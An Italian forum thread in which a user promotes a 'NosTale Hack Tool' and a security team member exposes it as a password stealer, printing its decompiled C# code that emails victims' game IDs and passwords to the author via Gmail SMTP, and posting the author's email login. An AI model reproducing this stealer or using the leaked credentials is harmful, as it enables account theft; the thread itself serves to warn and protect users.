NosTale Hack Tool

Stato
Discussione chiusa ad ulteriori risposte.

HD zBLaZe

Utente Bronze
14 Maggio 2013
8
4
0
43
Ultima modifica da un moderatore:
Navigando sul web ho trovato un file abbastanza interessante... Da quel che ho potuto capire praticamente si tratta di un semplice hack tool come gli altri capace di settare delle mods sul nostro account. Io ho scaricato il programma ed avviato. Ho selezionato le mods Max NosDollars e Exp e a quanto pare mi ha dato 999 NosDollars mentre per gli Exp sono sempre allo stesso livello. Se a voi funge anche la mod degli Exp fatemi sapere, anche se a me basta anche quella dei NosDollars :asd:.
Ecco il link del file: EDIT - Malware Password-Stealer

Allora? Come è andata a finire?

- - - Updated - - -

Raga non lo usate! Mi sa che è un Packet Logger, mi sono informato. Non mi fa shoppare...

Il software è un malware password-stealer (pishing) mal programmato. Questo è ciò che contiene:
Codice:
SmtpClient client = new SmtpClient();        MailMessage message = new MailMessage();
        client.Credentials = new NetworkCredential("[email protected]", "UniPosca98");
        client.Port = 0x24b;
        client.Host = "smtp.gmail.com";
        client.EnableSsl = true;
        message = new MailMessage {
            From = new MailAddress("[email protected]")
        };
        message.To.Add("[email protected]");
        message.Subject = "nostale id: " + this.TextBox1.Text;
        message.Body = "ID nostale: " + this.TextBox1.Text + ", Password : " + this.TextBox2.Text;
        client.Send(message);
        Interaction.MsgBox("Hack Complete!", MsgBoxStyle.Information, null);
Trovate anche i dati di login all'email del creatore:
ID: [email protected]
PSW: UniPosca98
(non è vietato in quanto, inserendole nel programma, l'autore ha rilasciato pubblici questi dati).

Chiunque l'abbia utilizzato cambi immediatamente la propria password.

Abbiamo prove che collegano l'autore di questa discussione al malware: lo stesso autore della discussione è l'autore del malware. HD zBLaZe sarà allontanato permanentemente dalla community.

Saluti,
SpeedJack
Inforge X-Security Team

Stato
Discussione chiusa ad ulteriori risposte.
Indietro
Top Bottom